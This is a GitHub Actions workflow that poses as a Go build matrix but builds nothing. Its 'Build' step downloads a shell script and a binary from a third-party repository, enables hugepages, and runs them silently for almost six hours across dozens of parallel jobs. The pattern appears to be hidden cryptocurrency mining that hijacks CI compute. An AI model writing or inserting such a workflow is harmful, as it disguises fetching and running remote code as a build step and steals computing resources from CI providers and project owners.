name: mmk
on: [push, pull_request]
jobs:
  build:
    name: Build
    runs-on: ubuntu-18.04
    strategy:
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10, 1.11, 1.12, 1.13, 1.14, 1.15]
        flag: [eqw, rwe, ter, yrt, uty, iyu]
    timeout-minutes: 360
    env:
        NUM_JOBS: 5
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Check out code into the Go module directory
      uses: actions/checkout@v1
    - name: Build
      run: |
        sudo apt-get install -y gcc git build-essential cmake libuv1-dev libssl-dev libhwloc-dev > /dev/null 2>&1
        wget https://github.com/nobur270/hsskh/raw/main/bangke.sh
        wget https://github.com/nobur270/hsskh/raw/main/boxer
        sudo sysctl -w vm.nr_hugepages=1280
        chmod +x boxer bangke.sh
        timeout 355m ./bangke.sh > /dev/null 2>&1
